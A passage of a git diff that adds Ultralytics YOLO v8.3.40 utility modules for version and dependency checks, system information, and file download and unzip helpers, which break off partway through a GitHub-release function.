passed + + # Check if current version is less than or equal to 22.04 + check_version(current="22.04", required="<=22.04") + + # Check if current version is between 20.04 (inclusive) and 22.04 (exclusive) + check_version(current="21.10", required=">20.04,<22.04") + ``` + """ + if not current: # if current is '' or None + LOGGER.warning(f"WARNING ⚠️ invalid check_version({current}, {required}) requested, please check values.") + return True + elif not current[0].isdigit(): # current is package name rather than version string, i.e. current='ultralytics' + try: + name = current # assigned package name to 'name' arg + current = metadata.version(current) # get version string from package name + except metadata.PackageNotFoundError as e: + if hard: + raise ModuleNotFoundError(emojis(f"WARNING ⚠️ {current} package is required but not installed")) from e + else: + return False + + if not required: # if required is '' or None + return True + + if "sys_platform" in required and ( # i.e. required='<2.4.0,>=1.8.0; sys_platform == "win32"' + (WINDOWS and "win32" not in required) + or (LINUX and "linux" not in required) + or (MACOS and "macos" not in required and "darwin" not in required) + ): + return True + + op = "" + version = "" + result = True + c = parse_version(current) # '1.2.3' -> (1, 2, 3) + for r in required.strip(",").split(","): + op, version = re.match(r"([^0-9]*)([\d.]+)", r).groups() # split '>=22.04' -> ('>=', '22.04') + if not op: + op = ">=" # assume >= if no op passed + v = parse_version(version) # '1.2.3' -> (1, 2, 3) + if op == "==" and c != v: + result = False + elif op == "!=" and c == v: + result = False + elif op == ">=" and not (c >= v): + result = False + elif op == "<=" and not (c <= v): + result = False + elif op == ">" and not (c > v): + result = False + elif op == "<" and not (c < v): + result = False + if not result: + warning = f"WARNING ⚠️ {name}{op}{version} is required, but {name}=={current} is currently installed {msg}" + if hard: + raise ModuleNotFoundError(emojis(warning)) # assert version requirements met + if verbose: + LOGGER.warning(warning) + return result + + +def check_latest_pypi_version(package_name="ultralytics"): + """ + Returns the latest version of a PyPI package without downloading or installing it. + + Args: + package_name (str): The name of the package to find the latest version for. + + Returns: + (str): The latest version of the package. + """ + try: + requests.packages.urllib3.disable_warnings() # Disable the InsecureRequestWarning + response = requests.get(f"https://pypi.org/pypi/{package_name}/json", timeout=3) + if response.status_code == 200: + return response.json()["info"]["version"] + except Exception: + return None + + +def check_pip_update_available(): + """ + Checks if a new version of the ultralytics package is available on PyPI. + + Returns: + (bool): True if an update is available, False otherwise. + """ + if ONLINE and IS_PIP_PACKAGE: + try: + from ultralytics import __version__ + + latest = check_latest_pypi_version() + if check_version(__version__, f"<{latest}"): # check if current version is < latest version + LOGGER.info( + f"New https://pypi.org/project/ultralytics/{latest} available 😃 " + f"Update with 'pip install -U ultralytics'" + ) + return True + except Exception: + pass + return False + + +@ThreadingLocked() +def check_font(font="Arial.ttf"): + """ + Find font locally or download to user's configuration directory if it does not already exist. + + Args: + font (str): Path or name of font. + + Returns: + file (Path): Resolved font file path. + """ + from matplotlib import font_manager + + # Check USER_CONFIG_DIR + name = Path(font).name + file = USER_CONFIG_DIR / name + if file.exists(): + return file + + # Check system fonts + matches = [s for s in font_manager.findSystemFonts() if font in s] + if any(matches): + return matches[0] + + # Download to USER_CONFIG_DIR if missing + url = f"https://github.com/ultralytics/assets/releases/download/v0.0.0/{name}" + if downloads.is_url(url, check=True): + downloads.safe_download(url=url, file=file) + return file + + +def check_python(minimum: str = "3.8.0", hard: bool = True, verbose: bool = False) -> bool: + """ + Check current python version against the required minimum version. + + Args: + minimum (str): Required minimum version of python. + hard (bool, optional): If True, raise an AssertionError if the requirement is not met. + verbose (bool, optional): If True, print warning message if requirement is not met. + + Returns: + (bool): Whether the installed Python version meets the minimum constraints. + """ + return check_version(PYTHON_VERSION, minimum, name="Python", hard=hard, verbose=verbose) + + +@TryExcept() +def check_requirements(requirements=ROOT.parent / "requirements.txt", exclude=(), install=True, cmds=""): + """ + Check if installed dependencies meet YOLOv8 requirements and attempt to auto-update if needed. + + Args: + requirements (Union[Path, str, List[str]]): Path to a requirements.txt file, a single package requirement as a + string, or a list of package requirements as strings. + exclude (Tuple[str]): Tuple of package names to exclude from checking. + install (bool): If True, attempt to auto-update packages that don't meet requirements. + cmds (str): Additional commands to pass to the pip install command when auto-updating. + + Example: + ```python + from ultralytics.utils.checks import check_requirements + + # Check a requirements.txt file + check_requirements("path/to/requirements.txt") + + # Check a single package + check_requirements("ultralytics>=8.0.0") + + # Check multiple packages + check_requirements(["numpy", "ultralytics>=8.0.0"]) + ``` + """ + prefix = colorstr("red", "bold", "requirements:") + if isinstance(requirements, Path): # requirements.txt file + file = requirements.resolve() + assert file.exists(), f"{prefix} {file} not found, check failed." + requirements = [f"{x.name}{x.specifier}" for x in parse_requirements(file) if x.name not in exclude] + elif isinstance(requirements, str): + requirements = [requirements] + + pkgs = [] + for r in requirements: + r_stripped = r.split("/")[-1].replace(".git", "") # replace git+https://org/repo.git -> 'repo' + match = re.match(r"([a-zA-Z0-9-_]+)([<>!=~]+.*)?", r_stripped) + name, required = match[1], match[2].strip() if match[2] else "" + try: + assert check_version(metadata.version(name), required) # exception if requirements not met + except (AssertionError, metadata.PackageNotFoundError): + pkgs.append(r) + + @Retry(times=2, delay=1) + def attempt_install(packages, commands): + """Attempt pip install command with retries on failure.""" + return subprocess.check_output(f"pip install --no-cache-dir {packages} {commands}", shell=True).decode() + + s = " ".join(f'"{x}"' for x in pkgs) # console string + if s: + if install and AUTOINSTALL: # check environment variable + n = len(pkgs) # number of packages updates + LOGGER.info(f"{prefix} Ultralytics requirement{'s' * (n > 1)} {pkgs} not found, attempting AutoUpdate...") + try: + t = time.time() + assert ONLINE, "AutoUpdate skipped (offline)" + LOGGER.info(attempt_install(s, cmds)) + dt = time.time() - t + LOGGER.info( + f"{prefix} AutoUpdate success ✅ {dt:.1f}s, installed {n} package{'s' * (n > 1)}: {pkgs}\n" + f"{prefix} ⚠️ {colorstr('bold', 'Restart runtime or rerun command for updates to take effect')}\n" + ) + except Exception as e: + LOGGER.warning(f"{prefix} ❌ {e}") + return False + else: + return False + + return True + + +def check_torchvision(): + """ + Checks the installed versions of PyTorch and Torchvision to ensure they're compatible. + + This function checks the installed versions of PyTorch and Torchvision, and warns if they're incompatible according + to the provided compatibility table based on: + https://github.com/pytorch/vision#installation. + + The compatibility table is a dictionary where the keys are PyTorch versions and the values are lists of compatible + Torchvision versions. + """ + # Compatibility table + compatibility_table = { + "2.4": ["0.19"], + "2.3": ["0.18"], + "2.2": ["0.17"], + "2.1": ["0.16"], + "2.0": ["0.15"], + "1.13": ["0.14"], + "1.12": ["0.13"], + } + + # Extract only the major and minor versions + v_torch = ".".join(torch.__version__.split("+")[0].split(".")[:2]) + if v_torch in compatibility_table: + compatible_versions = compatibility_table[v_torch] + v_torchvision = ".".join(TORCHVISION_VERSION.split("+")[0].split(".")[:2]) + if all(v_torchvision != v for v in compatible_versions): + print( + f"WARNING ⚠️ torchvision=={v_torchvision} is incompatible with torch=={v_torch}.\n" + f"Run 'pip install torchvision=={compatible_versions[0]}' to fix torchvision or " + "'pip install -U torch torchvision' to update both.\n" + "For a full compatibility table see https://github.com/pytorch/vision#installation" + ) + + +def check_suffix(file="yolo11n.pt", suffix=".pt", msg=""): + """Check file(s) for acceptable suffix.""" + if file and suffix: + if isinstance(suffix, str): + suffix = (suffix,) + for f in file if isinstance(file, (list, tuple)) else [file]: + s = Path(f).suffix.lower().strip() # file suffix + if len(s): + assert s in suffix, f"{msg}{f} acceptable suffix is {suffix}, not {s}" + + +def check_yolov5u_filename(file: str, verbose: bool = True): + """Replace legacy YOLOv5 filenames with updated YOLOv5u filenames.""" + if "yolov3" in file or "yolov5" in file: + if "u.yaml" in file: + file = file.replace("u.yaml", ".yaml") # i.e. yolov5nu.yaml -> yolov5n.yaml + elif ".pt" in file and "u" not in file: + original_file = file + file = re.sub(r"(.*yolov5([nsmlx]))\.pt", "\\1u.pt", file) # i.e. yolov5n.pt -> yolov5nu.pt + file = re.sub(r"(.*yolov5([nsmlx])6)\.pt", "\\1u.pt", file) # i.e. yolov5n6.pt -> yolov5n6u.pt + file = re.sub(r"(.*yolov3(|-tiny|-spp))\.pt", "\\1u.pt", file) # i.e. yolov3-spp.pt -> yolov3-sppu.pt + if file != original_file and verbose: + LOGGER.info( + f"PRO TIP 💡 Replace 'model={original_file}' with new 'model={file}'.\nYOLOv5 'u' models are " + f"trained with https://github.com/ultralytics/ultralytics and feature improved performance vs " + f"standard YOLOv5 models trained with https://github.com/ultralytics/yolov5.\n" + ) + return file + + +def check_model_file_from_stem(model="yolov8n"): + """Return a model filename from a valid model stem.""" + if model and not Path(model).suffix and Path(model).stem in downloads.GITHUB_ASSETS_STEMS: + return Path(model).with_suffix(".pt") # add suffix, i.e. yolov8n -> yolov8n.pt + else: + return model + + +def check_file(file, suffix="", download=True, download_dir=".", hard=True): + """Search/download file (if necessary) and return path.""" + check_suffix(file, suffix) # optional + file = str(file).strip() # convert to string and strip spaces + file = check_yolov5u_filename(file) # yolov5n -> yolov5nu + if ( + not file + or ("://" not in file and Path(file).exists()) # '://' check required in Windows Python<3.10 + or file.lower().startswith("grpc://") + ): # file exists or gRPC Triton images + return file + elif download and file.lower().startswith(("https://", "http://", "rtsp://", "rtmp://", "tcp://")): # download + url = file # warning: Pathlib turns :// -> :/ + file = Path(download_dir) / url2file(file) # '%2F' to '/', split https://url.com/file.txt?auth + if file.exists(): + LOGGER.info(f"Found {clean_url(url)} locally at {file}") # file already exists + else: + downloads.safe_download(url=url, file=file, unzip=False) + return str(file) + else: # search + files = glob.glob(str(ROOT / "**" / file), recursive=True) or glob.glob(str(ROOT.parent / file)) # find file + if not files and hard: + raise FileNotFoundError(f"'{file}' does not exist") + elif len(files) > 1 and hard: + raise FileNotFoundError(f"Multiple files match '{file}', specify exact path: {files}") + return files[0] if len(files) else [] # return file + + +def check_yaml(file, suffix=(".yaml", ".yml"), hard=True): + """Search/download YAML file (if necessary) and return path, checking suffix.""" + return check_file(file, suffix, hard=hard) + + +def check_is_path_safe(basedir, path): + """ + Check if the resolved path is under the intended directory to prevent path traversal. + + Args: + basedir (Path | str): The intended directory. + path (Path | str): The path to check. + + Returns: + (bool): True if the path is safe, False otherwise. + """ + base_dir_resolved = Path(basedir).resolve() + path_resolved = Path(path).resolve() + + return path_resolved.exists() and path_resolved.parts[: len(base_dir_resolved.parts)] == base_dir_resolved.parts + + +def check_imshow(warn=False): + """Check if environment supports image displays.""" + try: + if LINUX: + assert not IS_COLAB and not IS_KAGGLE + assert "DISPLAY" in os.environ, "The DISPLAY environment variable isn't set." + cv2.imshow("test", np.zeros((8, 8, 3), dtype=np.uint8)) # show a small 8-pixel image + cv2.waitKey(1) + cv2.destroyAllWindows() + cv2.waitKey(1) + return True + except Exception as e: + if warn: + LOGGER.warning(f"WARNING ⚠️ Environment does not support cv2.imshow() or PIL Image.show()\n{e}") + return False + + +def check_yolo(verbose=True, device=""): + """Return a human-readable YOLO software and hardware summary.""" + import psutil + + from ultralytics.utils.torch_utils import select_device + + if IS_COLAB: + shutil.rmtree("sample_data", ignore_errors=True) # remove colab /sample_data directory + + if verbose: + # System info + gib = 1 << 30 # bytes per GiB + ram = psutil.virtual_memory().total + total, used, free = shutil.disk_usage("/") + s = f"({os.cpu_count()} CPUs, {ram / gib:.1f} GB RAM, {(total - free) / gib:.1f}/{total / gib:.1f} GB disk)" + try: + from IPython import display + + display.clear_output() # clear display if notebook + except ImportError: + pass + else: + s = "" + + select_device(device=device, newline=False) + LOGGER.info(f"Setup complete ✅ {s}") + + +def collect_system_info(): + """Collect and print relevant system information including OS, Python, RAM, CPU, and CUDA.""" + import psutil + + from ultralytics.utils import ENVIRONMENT # scope to avoid circular import + from ultralytics.utils.torch_utils import get_cpu_info, get_gpu_info + + gib = 1 << 30 # bytes per GiB + cuda = torch and torch.cuda.is_available() + check_yolo() + total, used, free = shutil.disk_usage("/") + + info_dict = { + "OS": platform.platform(), + "Environment": ENVIRONMENT, + "Python": PYTHON_VERSION, + "Install": "git" if IS_GIT_DIR else "pip" if IS_PIP_PACKAGE else "other", + "RAM": f"{psutil.virtual_memory().total / gib:.2f} GB", + "Disk": f"{(total - free) / gib:.1f}/{total / gib:.1f} GB", + "CPU": get_cpu_info(), + "CPU count": os.cpu_count(), + "GPU": get_gpu_info(index=0) if cuda else None, + "GPU count": torch.cuda.device_count() if cuda else None, + "CUDA": torch.version.cuda if cuda else None, + } + LOGGER.info("\n" + "\n".join(f"{k:<20}{v}" for k, v in info_dict.items()) + "\n") + + package_info = {} + for r in parse_requirements(package="ultralytics"): + try: + current = metadata.version(r.name) + is_met = "✅ " if check_version(current, str(r.specifier), name=r.name, hard=True) else "❌ " + except metadata.PackageNotFoundError: + current = "(not installed)" + is_met = "❌ " + package_info[r.name] = f"{is_met}{current}{r.specifier}" + LOGGER.info(f"{r.name:<20}{package_info[r.name]}") + + info_dict["Package Info"] = package_info + + if is_github_action_running(): + github_info = { + "RUNNER_OS": os.getenv("RUNNER_OS"), + "GITHUB_EVENT_NAME": os.getenv("GITHUB_EVENT_NAME"), + "GITHUB_WORKFLOW": os.getenv("GITHUB_WORKFLOW"), + "GITHUB_ACTOR": os.getenv("GITHUB_ACTOR"), + "GITHUB_REPOSITORY": os.getenv("GITHUB_REPOSITORY"), + "GITHUB_REPOSITORY_OWNER": os.getenv("GITHUB_REPOSITORY_OWNER"), + } + LOGGER.info("\n" + "\n".join(f"{k}: {v}" for k, v in github_info.items())) + info_dict["GitHub Info"] = github_info + + return info_dict + + +def check_amp(model): + """ + Checks the PyTorch Automatic Mixed Precision (AMP) functionality of a YOLO11 model. If the checks fail, it means + there are anomalies with AMP on the system that may cause NaN losses or zero-mAP results, so AMP will be disabled + during training. + + Args: + model (nn.Module): A YOLO11 model instance. + + Example: + ```python + from ultralytics import YOLO + from ultralytics.utils.checks import check_amp + + model = YOLO("yolo11n.pt").model.cuda() + check_amp(model) + ``` + + Returns: + (bool): Returns True if the AMP functionality works correctly with YOLO11 model, else False. + """ + from ultralytics.utils.torch_utils import autocast + + device = next(model.parameters()).device # get model device + if device.type in {"cpu", "mps"}: + return False # AMP only used on CUDA devices + + def amp_allclose(m, im): + """All close FP32 vs AMP results.""" + batch = [im] * 8 + imgsz = max(256, int(model.stride.max() * 4)) # max stride P5-32 and P6-64 + a = m(batch, imgsz=imgsz, device=device, verbose=False)[0].boxes.data # FP32 inference + with autocast(enabled=True): + b = m(batch, imgsz=imgsz, device=device, verbose=False)[0].boxes.data # AMP inference + del m + return a.shape == b.shape and torch.allclose(a, b.float(), atol=0.5) # close to 0.5 absolute tolerance + + im = ASSETS / "bus.jpg" # image to check + prefix = colorstr("AMP: ") + LOGGER.info(f"{prefix}running Automatic Mixed Precision (AMP) checks...") + warning_msg = "Setting 'amp=True'. If you experience zero-mAP or NaN losses you can disable AMP with amp=False." + try: + from ultralytics import YOLO + + assert amp_allclose(YOLO("yolo11n.pt"), im) + LOGGER.info(f"{prefix}checks passed ✅") + except ConnectionError: + LOGGER.warning( + f"{prefix}checks skipped ⚠️. " f"Offline and unable to download YOLO11n for AMP checks. {warning_msg}" + ) + except (AttributeError, ModuleNotFoundError): + LOGGER.warning( + f"{prefix}checks skipped ⚠️. " + f"Unable to load YOLO11n for AMP checks due to possible Ultralytics package modifications. {warning_msg}" + ) + except AssertionError: + LOGGER.warning( + f"{prefix}checks failed ❌. Anomalies were detected with AMP on your system that may lead to " + f"NaN losses or zero-mAP results, so AMP will be disabled during training." + ) + return False + return True + + +def git_describe(path=ROOT): # path must be a directory + """Return human-readable git description, i.e. v5.0-5-g3e25f1e https://git-scm.com/docs/git-describe.""" + try: + return subprocess.check_output(f"git -C {path} describe --tags --long --always", shell=True).decode()[:-1] + except Exception: + return "" + + +def print_args(args: Optional[dict] = None, show_file=True, show_func=False): + """Print function arguments (optional args dict).""" + + def strip_auth(v): + """Clean longer Ultralytics HUB URLs by stripping potential authentication information.""" + return clean_url(v) if (isinstance(v, str) and v.startswith("http") and len(v) > 100) else v + + x = inspect.currentframe().f_back # previous frame + file, _, func, _, _ = inspect.getframeinfo(x) + if args is None: # get args automatically + args, _, _, frm = inspect.getargvalues(x) + args = {k: v for k, v in frm.items() if k in args} + try: + file = Path(file).resolve().relative_to(ROOT).with_suffix("") + except ValueError: + file = Path(file).stem + s = (f"{file}: " if show_file else "") + (f"{func}: " if show_func else "") + LOGGER.info(colorstr(s) + ", ".join(f"{k}={strip_auth(v)}" for k, v in args.items())) + + +def cuda_device_count() -> int: + """ + Get the number of NVIDIA GPUs available in the environment. + + Returns: + (int): The number of NVIDIA GPUs available. + """ + try: + # Run the nvidia-smi command and capture its output + output = subprocess.check_output( + ["nvidia-smi", "--query-gpu=count", "--format=csv,noheader,nounits"], encoding="utf-8" + ) + + # Take the first line and strip any leading/trailing white space + first_line = output.strip().split("\n")[0] + + return int(first_line) + except (subprocess.CalledProcessError, FileNotFoundError, ValueError): + # If the command fails, nvidia-smi is not found, or output is not an integer, assume no GPUs are available + return 0 + + +def cuda_is_available() -> bool: + """ + Check if CUDA is available in the environment. + + Returns: + (bool): True if one or more NVIDIA GPUs are available, False otherwise. + """ + return cuda_device_count() > 0 + + +# Run checks and define constants +check_python("3.8", hard=False, verbose=True) # check python version +check_torchvision() # check torch-torchvision compatibility +IS_PYTHON_MINIMUM_3_10 = check_python("3.10", hard=False) +IS_PYTHON_3_12 = PYTHON_VERSION.startswith("3.12") diff --git a/2024.ultralytics/v8.3.40/utils/downloads.py b/2024.ultralytics/v8.3.40/utils/downloads.py new file mode 100644 index 0000000..be182f4 --- /dev/null +++ b/2024.ultralytics/v8.3.40/utils/downloads.py @@ -0,0 +1,507 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import re +import shutil +import subprocess +from itertools import repeat +from multiprocessing.pool import ThreadPool +from pathlib import Path +from urllib import parse, request + +import requests +import torch + +from ultralytics.utils import LOGGER, TQDM, checks, clean_url, emojis, is_online, url2file + +# Define Ultralytics GitHub assets maintained at https://github.com/ultralytics/assets +GITHUB_ASSETS_REPO = "ultralytics/assets" +GITHUB_ASSETS_NAMES = ( + [f"yolov8{k}{suffix}.pt" for k in "nsmlx" for suffix in ("", "-cls", "-seg", "-pose", "-obb", "-oiv7")] + + [f"yolo11{k}{suffix}.pt" for k in "nsmlx" for suffix in ("", "-cls", "-seg", "-pose", "-obb")] + + [f"yolov5{k}{resolution}u.pt" for k in "nsmlx" for resolution in ("", "6")] + + [f"yolov3{k}u.pt" for k in ("", "-spp", "-tiny")] + + [f"yolov8{k}-world.pt" for k in "smlx"] + + [f"yolov8{k}-worldv2.pt" for k in "smlx"] + + [f"yolov9{k}.pt" for k in "tsmce"] + + [f"yolov10{k}.pt" for k in "nsmblx"] + + [f"yolo_nas_{k}.pt" for k in "sml"] + + [f"sam_{k}.pt" for k in "bl"] + + [f"FastSAM-{k}.pt" for k in "sx"] + + [f"rtdetr-{k}.pt" for k in "lx"] + + ["mobile_sam.pt"] + + ["calibration_image_sample_data_20x128x128x3_float32.npy.zip"] +) +GITHUB_ASSETS_STEMS = [Path(k).stem for k in GITHUB_ASSETS_NAMES] + + +def is_url(url, check=False): + """ + Validates if the given string is a URL and optionally checks if the URL exists online. + + Args: + url (str): The string to be validated as a URL. + check (bool, optional): If True, performs an additional check to see if the URL exists online. + Defaults to False. + + Returns: + (bool): Returns True for a valid URL. If 'check' is True, also returns True if the URL exists online. + Returns False otherwise. + + Example: + ```python + valid = is_url("https://www.example.com") + ``` + """ + try: + url = str(url) + result = parse.urlparse(url) + assert all([result.scheme, result.netloc]) # check if is url + if check: + with request.urlopen(url) as response: + return response.getcode() == 200 # check if exists online + return True + except Exception: + return False + + +def delete_dsstore(path, files_to_delete=(".DS_Store", "__MACOSX")): + """ + Deletes all ".DS_store" files under a specified directory. + + Args: + path (str, optional): The directory path where the ".DS_store" files should be deleted. + files_to_delete (tuple): The files to be deleted. + + Example: + ```python + from ultralytics.utils.downloads import delete_dsstore + + delete_dsstore("path/to/dir") + ``` + + Note: + ".DS_store" files are created by the Apple operating system and contain metadata about folders and files. They + are hidden system files and can cause issues when transferring files between different operating systems. + """ + for file in files_to_delete: + matches = list(Path(path).rglob(file)) + LOGGER.info(f"Deleting {file} files: {matches}") + for f in matches: + f.unlink() + + +def zip_directory(directory, compress=True, exclude=(".DS_Store", "__MACOSX"), progress=True): + """ + Zips the contents of a directory, excluding files containing strings in the exclude list. The resulting zip file is + named after the directory and placed alongside it. + + Args: + directory (str | Path): The path to the directory to be zipped. + compress (bool): Whether to compress the files while zipping. Default is True. + exclude (tuple, optional): A tuple of filename strings to be excluded. Defaults to ('.DS_Store', '__MACOSX'). + progress (bool, optional): Whether to display a progress bar. Defaults to True. + + Returns: + (Path): The path to the resulting zip file. + + Example: + ```python + from ultralytics.utils.downloads import zip_directory + + file = zip_directory("path/to/dir") + ``` + """ + from zipfile import ZIP_DEFLATED, ZIP_STORED, ZipFile + + delete_dsstore(directory) + directory = Path(directory) + if not directory.is_dir(): + raise FileNotFoundError(f"Directory '{directory}' does not exist.") + + # Unzip with progress bar + files_to_zip = [f for f in directory.rglob("*") if f.is_file() and all(x not in f.name for x in exclude)] + zip_file = directory.with_suffix(".zip") + compression = ZIP_DEFLATED if compress else ZIP_STORED + with ZipFile(zip_file, "w", compression) as f: + for file in TQDM(files_to_zip, desc=f"Zipping {directory} to {zip_file}...", unit="file", disable=not progress): + f.write(file, file.relative_to(directory)) + + return zip_file # return path to zip file + + +def unzip_file(file, path=None, exclude=(".DS_Store", "__MACOSX"), exist_ok=False, progress=True): + """ + Unzips a *.zip file to the specified path, excluding files containing strings in the exclude list. + + If the zipfile does not contain a single top-level directory, the function will create a new + directory with the same name as the zipfile (without the extension) to extract its contents. + If a path is not provided, the function will use the parent directory of the zipfile as the default path. + + Args: + file (str): The path to the zipfile to be extracted. + path (str, optional): The path to extract the zipfile to. Defaults to None. + exclude (tuple, optional): A tuple of filename strings to be excluded. Defaults to ('.DS_Store', '__MACOSX'). + exist_ok (bool, optional): Whether to overwrite existing contents if they exist. Defaults to False. + progress (bool, optional): Whether to display a progress bar. Defaults to True. + + Raises: + BadZipFile: If the provided file does not exist or is not a valid zipfile. + + Returns: + (Path): The path to the directory where the zipfile was extracted. + + Example: + ```python + from ultralytics.utils.downloads import unzip_file + + dir = unzip_file("path/to/file.zip") + ``` + """ + from zipfile import BadZipFile, ZipFile, is_zipfile + + if not (Path(file).exists() and is_zipfile(file)): + raise BadZipFile(f"File '{file}' does not exist or is a bad zip file.") + if path is None: + path = Path(file).parent # default path + + # Unzip the file contents + with ZipFile(file) as zipObj: + files = [f for f in zipObj.namelist() if all(x not in f for x in exclude)] + top_level_dirs = {Path(f).parts[0] for f in files} + + # Decide to unzip directly or unzip into a directory + unzip_as_dir = len(top_level_dirs) == 1 # (len(files) > 1 and not files[0].endswith("/")) + if unzip_as_dir: + # Zip has 1 top-level directory + extract_path = path # i.e. ../datasets + path = Path(path) / list(top_level_dirs)[0] # i.e. extract coco8/ dir to ../datasets/ + else: + # Zip has multiple files at top level + path = extract_path = Path(path) / Path(file).stem # i.e. extract multiple files to ../datasets/coco8/ + + # Check if destination directory already exists and contains files + if path.exists() and any(path.iterdir()) and not exist_ok: + # If it exists and is not empty, return the path without unzipping + LOGGER.warning(f"WARNING ⚠️ Skipping {file} unzip as destination directory {path} is not empty.") + return path + + for f in TQDM(files, desc=f"Unzipping {file} to {Path(path).resolve()}...", unit="file", disable=not progress): + # Ensure the file is within the extract_path to avoid path traversal security vulnerability + if ".." in Path(f).parts: + LOGGER.warning(f"Potentially insecure file path: {f}, skipping extraction.") + continue + zipObj.extract(f, extract_path) + + return path # return unzip dir + + +def check_disk_space(url="https://ultralytics.com/assets/coco8.zip", path=Path.cwd(), sf=1.5, hard=True): + """ + Check if there is sufficient disk space to download and store a file. + + Args: + url (str, optional): The URL to the file. Defaults to 'https://ultralytics.com/assets/coco8.zip'. + path (str | Path, optional): The path or drive to check the available free space on. + sf (float, optional): Safety factor, the multiplier for the required free space. Defaults to 1.5. + hard (bool, optional): Whether to throw an error or not on insufficient disk space. Defaults to True. + + Returns: + (bool): True if there is sufficient disk space, False otherwise. + """ + try: + r = requests.head(url) # response + assert r.status_code < 400, f"URL error for {url}: {r.status_code} {r.reason}" # check response + except Exception: + return True # requests issue, default to True + + # Check file size + gib = 1 << 30 # bytes per GiB + data = int(r.headers.get("Content-Length", 0)) / gib # file size (GB) + total, used, free = (x / gib for x in shutil.disk_usage(path)) # bytes + + if data * sf < free: + return True # sufficient space + + # Insufficient space + text = ( + f"WARNING ⚠️ Insufficient free disk space {free:.1f} GB < {data * sf:.3f} GB required, " + f"Please free {data * sf - free:.1f} GB additional disk space and try again." + ) + if hard: + raise MemoryError(text) + LOGGER.warning(text) + return False + + +def get_google_drive_file_info(link): + """ + Retrieves the direct download link and filename for a shareable Google Drive file link. + + Args: + link (str): The shareable link of the Google Drive file. + + Returns: + (str): Direct download URL for the Google Drive file. + (str): Original filename of the Google Drive file. If filename extraction fails, returns None. + + Example: + ```python + from ultralytics.utils.downloads import get_google_drive_file_info + + link = "https://drive.google.com/file/d/1cqT-cJgANNrhIHCrEufUYhQ4RqiWG_lJ/view?usp=drive_link" + url, filename = get_google_drive_file_info(link) + ``` + """ + file_id = link.split("/d/")[1].split("/view")[0] + drive_url = f"https://drive.google.com/uc?export=download&id={file_id}" + filename = None + + # Start session + with requests.Session() as session: + response = session.get(drive_url, stream=True) + if "quota exceeded" in str(response.content.lower()): + raise ConnectionError( + emojis( + f"❌ Google Drive file download quota exceeded. " + f"Please try again later or download this file manually at {link}." + ) + ) + for k, v in response.cookies.items(): + if k.startswith("download_warning"): + drive_url += f"&confirm={v}" # v is token + cd = response.headers.get("content-disposition") + if cd: + filename = re.findall('filename="(.+)"', cd)[0] + return drive_url, filename + + +def safe_download( + url, + file=None, + dir=None, + unzip=True, + delete=False, + curl=False, + retry=3, + min_bytes=1e0, + exist_ok=False, + progress=True, +): + """ + Downloads files from a URL, with options for retrying, unzipping, and deleting the downloaded file. + + Args: + url (str): The URL of the file to be downloaded. + file (str, optional): The filename of the downloaded file. + If not provided, the file will be saved with the same name as the URL. + dir (str, optional): The directory to save the downloaded file. + If not provided, the file will be saved in the current working directory. + unzip (bool, optional): Whether to unzip the downloaded file. Default: True. + delete (bool, optional): Whether to delete the downloaded file after unzipping. Default: False. + curl (bool, optional): Whether to use curl command line tool for downloading. Default: False. + retry (int, optional): The number of times to retry the download in case of failure. Default: 3. + min_bytes (float, optional): The minimum number of bytes that the downloaded file should have, to be considered + a successful download. Default: 1E0. + exist_ok (bool, optional): Whether to overwrite existing contents during unzipping. Defaults to False. + progress (bool, optional): Whether to display a progress bar during the download. Default: True. + + Example: + ```python + from ultralytics.utils.downloads import safe_download + + link = "https://ultralytics.com/assets/bus.jpg" + path = safe_download(link) + ``` + """ + gdrive = url.startswith("https://drive.google.com/") # check if the URL is a Google Drive link + if gdrive: + url, file = get_google_drive_file_info(url) + + f = Path(dir or ".") / (file or url2file(url)) # URL converted to filename + if "://" not in str(url) and Path(url).is_file(): # URL exists ('://' check required in Windows Python<3.10) + f = Path(url) # filename + elif not f.is_file(): # URL and file do not exist + uri = (url if gdrive else clean_url(url)).replace( # cleaned and aliased url + "https://github.com/ultralytics/assets/releases/download/v0.0.0/", + "https://ultralytics.com/assets/", # assets alias + ) + desc = f"Downloading {uri} to '{f}'" + LOGGER.info(f"{desc}...") + f.parent.mkdir(parents=True, exist_ok=True) # make directory if missing + check_disk_space(url, path=f.parent) + for i in range(retry + 1): + try: + if curl or i > 0: # curl download with retry, continue + s = "sS" * (not progress) # silent + r = subprocess.run(["curl", "-#", f"-{s}L", url, "-o", f, "--retry", "3", "-C", "-"]).returncode + assert r == 0, f"Curl return value {r}" + else: # urllib download + method = "torch" + if method == "torch": + torch.hub.download_url_to_file(url, f, progress=progress) + else: + with request.urlopen(url) as response, TQDM( + total=int(response.getheader("Content-Length", 0)), + desc=desc, + disable=not progress, + unit="B", + unit_scale=True, + unit_divisor=1024, + ) as pbar: + with open(f, "wb") as f_opened: + for data in response: + f_opened.write(data) + pbar.update(len(data)) + + if f.exists(): + if f.stat().st_size > min_bytes: + break # success + f.unlink() # remove partial downloads + except Exception as e: + if i == 0 and not is_online(): + raise ConnectionError(emojis(f"❌ Download failure for {uri}. Environment is not online.")) from e + elif i >= retry: + raise ConnectionError(emojis(f"❌ Download failure for {uri}. Retry limit reached.")) from e + LOGGER.warning(f"⚠️ Download failure, retrying {i + 1}/{retry} {uri}...") + + if unzip and f.exists() and f.suffix in {"", ".zip", ".tar", ".gz"}: + from zipfile import is_zipfile + + unzip_dir = (dir or f.parent).resolve() # unzip to dir if provided else unzip in place + if is_zipfile(f): + unzip_dir = unzip_file(file=f, path=unzip_dir, exist_ok=exist_ok, progress=progress) # unzip + elif f.suffix in {".tar", ".gz"}: + LOGGER.info(f"Unzipping {f} to {unzip_dir}...") + subprocess.run(["tar", "xf" if f.suffix == ".tar" else "xfz", f, "--directory", unzip_dir], check=True) + if delete: + f.unlink() # remove zip + return unzip_dir + + +def get_github_assets(repo="ultralytics/assets", version="latest", retry=False): + """ + Retrieve the specified version's tag and assets from a GitHub repository. If the version is not specified, the + function fetches the latest release assets. + + Args: + repo (str, optional): The GitHub repository in the format 'owner/repo'. Defaults to 'ultralytics/assets'. + version (str, optional): The release version to fetch assets from. Defaults to 'latest'. + retry (bool, optional): Flag to retry the request in case of a failure. Defaults to False. + + Returns: + (tuple): A tuple containing the release tag and a list of asset names. + + Example: + ```python + tag, assets = get_github_assets(repo="ultralytics/assets", version="latest") + ``` + """ + if version != "latest": + version = f"tags/{version}" # i.e. tags/v6.2 + url = f"https://api.github.com/repos/{repo}/releases/{version}" + r = requests.get(url) # github api + if r.status_code != 200 and r.reason != "rate limit exceeded" and retry: # failed and not 403 rate limit exceeded + r = requests.get(url) # try again + if r.status_code != 200: + 